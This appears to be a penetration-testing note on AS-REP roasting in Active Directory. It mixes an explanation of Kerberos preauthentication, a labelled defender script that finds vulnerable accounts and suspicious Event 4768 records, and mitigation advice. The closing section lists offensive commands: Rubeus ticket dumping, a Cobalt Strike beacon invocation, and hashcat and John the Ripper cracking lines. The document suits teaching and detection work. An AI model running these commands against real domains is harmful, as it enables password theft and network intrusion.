ASREP-Roasting

One of the first steps in Kerberos authentication is preauthentication. Preauthentication uses the user's password to encrypt a timestamp. The domain controller (DC) decrypts this to validate the password and to make sure a previous request is not being replayed. A vulnerability can result when preauthentication is disabled.

Once this is disabled, an attacker can request authentication data for any such user without knowing the password, and the DC will return an AS-REP containing an encrypted ticket-granting ticket (TGT). That encrypted material can then be brute forced offline to crack the password.

Preauthentication can be disabled on any user account in Active Directory on the Account tab under the Account options. Look for the checkbox "Do not require Kerberos preauthentication."
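A defender-side view of the same setting, added here as an example that is not part of the original notes: the checkbox maps to the DONT_REQ_PREAUTH bit (0x400000) in userAccountControl, and a TGT issued without preauthentication shows up in the DC's Event ID 4768 with Pre-Authentication Type 0. The account export and the 4768 records below are constructed sample data.

```python
# Added example (not from the original notes): find accounts with preauth disabled and
# flag 4768 events that look like AS-REP roasting. All inputs are constructed in-line.
DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit set by "Do not require Kerberos preauthentication"
RC4_HMAC = 0x17              # ticket encryption type that yields hashcat mode 18200 material

# Constructed AD export: (sAMAccountName, userAccountControl)
ACCOUNT_EXPORT = [
    ("svc_oracle", 0x400200),  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    ("jdoe",       0x200),     # NORMAL_ACCOUNT only
    ("svc_backup", 0x410200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
]


def accounts_without_preauth(export):
    """Return the account names whose userAccountControl has DONT_REQ_PREAUTH set."""
    return [name for name, uac in export if uac & DONT_REQ_PREAUTH]


# Constructed Event ID 4768 (Kerberos TGT requested) records, reduced to the
# EventData fields that matter. PreAuthType 0 = logon without preauthentication.
KDC_EVENTS = [
    {"TargetUserName": "svc_oracle", "PreAuthType": 0, "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.55"},
    {"TargetUserName": "jdoe",       "PreAuthType": 2, "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.21"},
    {"TargetUserName": "svc_backup", "PreAuthType": 0, "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.55"},
]


def suspected_asrep_roast(events):
    """Group by source IP the 4768 events issued without preauth and with RC4 (etype 23).

    One host requesting such tickets for several accounts is the pattern worth alerting on.
    """
    hits = {}
    for e in events:
        if e["PreAuthType"] == 0 and e["TicketEncryptionType"] == RC4_HMAC:
            hits.setdefault(e["IpAddress"], []).append(e["TargetUserName"])
    return hits


if __name__ == "__main__":
    print("preauth disabled:", accounts_without_preauth(ACCOUNT_EXPORT))
    print("suspected roasting:", suspected_asrep_roast(KDC_EVENTS))
```

Clearing the checkbox on every account the first function reports, or moving those accounts to AES-only keys so etype 23 is never issued, removes the material the commands below rely on.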

# Request TGT Ticket For All The Vulnerable Users
Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat

# Request for one user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asreproast /user:svc_oracle /nowrap

# Cracking with hashcat
hashcat64.exe -a 0 -m 18200 hashes.txt wordlist.txt

# Cracking with John the Ripper
john --format=krb5asrep --wordlist=wordlist svc_oracle